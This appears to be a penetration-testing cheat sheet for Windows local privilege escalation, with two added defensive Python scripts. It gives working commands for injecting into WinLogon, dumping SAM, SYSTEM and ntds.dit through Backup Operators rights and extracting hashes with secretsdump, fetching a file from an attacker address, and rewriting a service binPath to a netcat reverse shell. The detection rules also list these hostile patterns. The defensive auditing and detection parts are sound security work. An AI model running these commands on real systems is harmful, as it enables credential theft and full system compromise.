Windows Local Privilege Escalation

SeDebugPrivilege

Migrate into a privileged process such as WinLogon by using ProcessInjection to load the adopt binary there.

WinLogon PID: 3488

Adopt binary: adopt.exe

PS /home/bobbuilder> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

SeImpersonatePrivilege

Web service accounts (IIS application pools) usually have this enabled.

  • Use GodPotato or PrintSpoofer to escalate.
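Both privileges above are visible in whoami /priv output. The script below is an added example, not part of the original notes: it parses constructed whoami /priv output and reports the privileges this page treats as escalation paths, so an account can be audited for exposure before it is handed to a service. The sample output, the risk table and the function names are assumptions for the example.

```python
"""Audit a `whoami /priv` listing for privileges that allow escalation."""
import re

# Privileges the notes above treat as escalation paths, plus the closely
# related ones that usually travel with them. Descriptions are this example's own.
HIGH_RISK_PRIVILEGES = {
    "SeDebugPrivilege": "can open any process (e.g. winlogon.exe) and inject code",
    "SeImpersonatePrivilege": "token impersonation (GodPotato, PrintSpoofer)",
    "SeAssignPrimaryTokenPrivilege": "token replacement (same family as SeImpersonate)",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM, SYSTEM, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

# Constructed sample of `whoami /priv` output (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(?:.*\s)?(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def find_risky_privileges(text):
    """Return (privilege, state, why) for every high-risk privilege in the token.

    A Disabled privilege still counts: the holder can enable it at will, so
    the audit question is whether it is held at all, not whether it is on.
    """
    findings = []
    for name, state in parse_whoami_priv(text).items():
        if name in HIGH_RISK_PRIVILEGES:
            findings.append((name, state, HIGH_RISK_PRIVILEGES[name]))
    return findings


if __name__ == "__main__":
    for name, state, why in find_risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {why}")
```

Feed it the saved output of whoami /priv from each service account to see which ones carry SeImpersonatePrivilege or SeDebugPrivilege without needing them.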

BackupOperators

PS /home/bobbuilder> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt
PS /home/bobbuilder> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.48/10.10/disk.txt", "C:\Windows\Temp\disk.txt")
PS /home/bobbuilder> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /home/bobbuilder> E:
PS /home/bobbuilder> dir windows/ntds
PS /home/bobbuilder> reg save hklm\system c:\windows\temp\system.bak
PS /home/bobbuilder> reg save hklm\sam c:\windows\temp\sam.bak
PS /home/bobbuilder> upload ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilder> upload ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeUtils.dll
PS /home/bobbuilder> Import-Module .\SeBackupPrivilegeUtils.dll
PS /home/bobbuilder> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilder> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /home/bobbuilder> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak
bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

Server Operators

bobbuilder:/home# upload /usr/share/windows-resources/binaries/nc.exe
PS /home/bobbuilder> sc.exe config vss binPath= "C:\Path\nc.exe -e cmd.exe ip 1234"
PS /home/bobbuilder> sc.exe stop vss
PS /home/bobbuilder> sc.exe start vss
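The Backup Operators session (diskshadow snapshot, reg save of SAM and SYSTEM, SeBackupPrivilege cmdlets copying ntds.dit) and the Server Operators session (rewriting a service binPath to a netcat shell) both leave distinctive process command lines. The script below is an added detection example, not part of the original notes: it runs a small rule set over constructed Sysmon-style process-creation events and then groups hits by user, since one account tripping several of these rules in sequence is the strong signal. The event layout, user names, the 192.0.2.10 address and the function names are assumptions for the example.

```python
"""Flag process-creation events that match the Backup/Server Operators abuse
patterns in the notes above, then group hits by the account that produced them."""
import re
from collections import defaultdict

# (rule name, case-insensitive regex applied to the process command line)
RULES = [
    ("diskshadow_scripted",
     re.compile(r"diskshadow(\.exe)?\s+/s\s+", re.I)),
    ("registry_hive_save",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("sebackupprivilege_cmdlets",
     re.compile(r"SeBackupPrivilege(CmdLets|Utils)\.dll|Copy-FileSeBackupPrivilege", re.I)),
    ("ntds_dit_access",
     re.compile(r"\\ntds\\ntds\.dit", re.I)),
    ("service_binpath_change",
     re.compile(r"\bsc(\.exe)?\s+config\s+\S+\s+binpath=", re.I)),
    ("netcat_shell",
     re.compile(r"\bnc(\.exe)?\b.*\s-e\s+cmd(\.exe)?", re.I)),
]

# Constructed sample events in a Sysmon-like key=value layout (not real telemetry).
# CommandLine is always the last field so it may contain spaces and quotes.
SAMPLE_EVENTS = [
    "EventID=1 User=CORP\\bob Image=C:\\Windows\\System32\\diskshadow.exe CommandLine=diskshadow.exe /s C:\\Windows\\Temp\\disk.txt",
    "EventID=1 User=CORP\\bob Image=C:\\Windows\\System32\\reg.exe CommandLine=reg save hklm\\system c:\\windows\\temp\\system.bak",
    "EventID=1 User=CORP\\bob Image=C:\\Windows\\System32\\reg.exe CommandLine=reg save hklm\\sam c:\\windows\\temp\\sam.bak",
    "EventID=1 User=CORP\\bob Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell Copy-FileSeBackupPrivilege e:\\windows\\ntds\\ntds.dit c:\\windows\\temp\\ntds.dit",
    'EventID=1 User=CORP\\svc_backup Image=C:\\Windows\\System32\\sc.exe CommandLine=sc.exe config vss binPath= "C:\\Path\\nc.exe -e cmd.exe 192.0.2.10 1234"',
    "EventID=1 User=CORP\\alice Image=C:\\Windows\\System32\\reg.exe CommandLine=reg query hklm\\software\\microsoft\\windows\\currentversion\\run",
    "EventID=1 User=NT AUTHORITY\\SYSTEM Image=C:\\Windows\\System32\\sc.exe CommandLine=sc query vss",
]

# key=value pairs; a value runs until the next " key=" or the end of the string
FIELD = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|\s*$)")


def parse_event(line):
    """Split one event line into a dict, keeping the whole CommandLine intact."""
    head, _, cmd = line.partition("CommandLine=")
    fields = dict(FIELD.findall(head))
    fields["CommandLine"] = cmd.strip()
    return fields


def detect(events):
    """Return a list of (user, rule_name, command_line) for every rule hit."""
    hits = []
    for line in events:
        ev = parse_event(line)
        cmd = ev.get("CommandLine", "")
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((ev.get("User", "?"), name, cmd))
    return hits


def users_with_multiple_rules(hits, min_rules=2):
    """Accounts that triggered at least `min_rules` distinct rules: the
    chain on this page (snapshot, hive save, ntds copy) comes from one user."""
    rules_by_user = defaultdict(set)
    for user, rule, _ in hits:
        rules_by_user[user].add(rule)
    return {u for u, rules in rules_by_user.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for user, rule, cmd in found:
        print(f"{user:24} {rule:26} {cmd}")
    print("escalation chains:", sorted(users_with_multiple_rules(found)))
```

The rules key on command lines rather than image paths because diskshadow.exe, reg.exe and sc.exe are all legitimate administrative binaries; it is the /s script, the hklm\sam or hklm\system target, and the binPath= rewrite that separate this activity from routine use.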